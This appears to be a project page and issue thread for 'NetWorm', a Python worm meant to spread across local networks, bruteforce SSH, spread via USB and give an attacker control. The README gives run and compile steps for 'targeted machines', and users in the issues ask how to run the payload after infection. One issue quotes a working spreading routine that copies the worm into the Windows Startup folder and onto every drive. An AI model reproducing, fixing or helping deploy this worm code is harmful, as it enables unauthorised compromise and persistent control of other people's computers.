networm's Introduction

NetWorm

forthebadge made-with-python

Python network worm that spreads on the local network and gives the attacker control of these machines.

This code is not finished and works more like a "worm template" for you to get inspiration at the moment.

You can bruteforce ssh servers, spread with USBs, etc..

Downloading necessary libraries

pip install -r requirements.txt

Executing

Windows & Linux:

python worm.py

Compilation (.exe)

Targeted machines won´t probably have python and the required libraries installed. To run this code on other machines, you need to convert it into an executable.

I recommend the Pyinstaller library.

To use it, simply write these commands in your terminal:

pip install pyinstaller

pyinstaller worm.py

networm's Issues

Payload Question

Does the payload get run after spreading to a new machine, if not how would one achieve that?

Libraries missing

After seeing the line "import nmap" I immediately knew it wasn't an inbuilt library. So I tried "pip install nmap" and it doesn't works. How can I get that library?

USB spreading works only on C drive

USB spreading doesn't work properly

worm.py only copies itself to C drive but it doesn't copy on other drives.

def usbspreading():

    bootfolder = os.path.expanduser('~') + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"

    while True:
        drives = win32api.GetLogicalDriveStrings()
        drives = drives.split('\000')[:-1]
        print(drives)
        for drive in drives:
            if "C:\\" in drives:
                copy2(__file__, bootfolder)
            else:
                copy2(__file__, drive)
        time.sleep(3)

usbspreading()

copy2(file, bootfolder) X copy2(file, drive)

When worm tries to copy itself to the C drive it copies to a specific path, therefore I believe the problem is the fact that copying on other drives does not have a specific path.

i cant use it

C:\Program Files (x86)\Nmap>worm.py
Traceback (most recent call last):
File "C:\Program Files (x86)\Nmap\worm.py", line 7, in
import nmap
ModuleNotFoundError: No module named 'nmap'``

what do i do wrong?

absolutely terrible

this will never work to spread a worm across networks nobody uses ssh in residential networks

Does not work

Idk if I don't know how to work it or because it doesn't work

Simple question

If i compile the worm to an .exe file, will the libraries and networking.py be in that executable aswell?

Hey a lil issue not to big.

Hello! I am wondering how this works in full detail? such as you open a prompt for it? I'm a bit of a newbie at this. I'd love some feedback I find this project very interesting to me

Much love
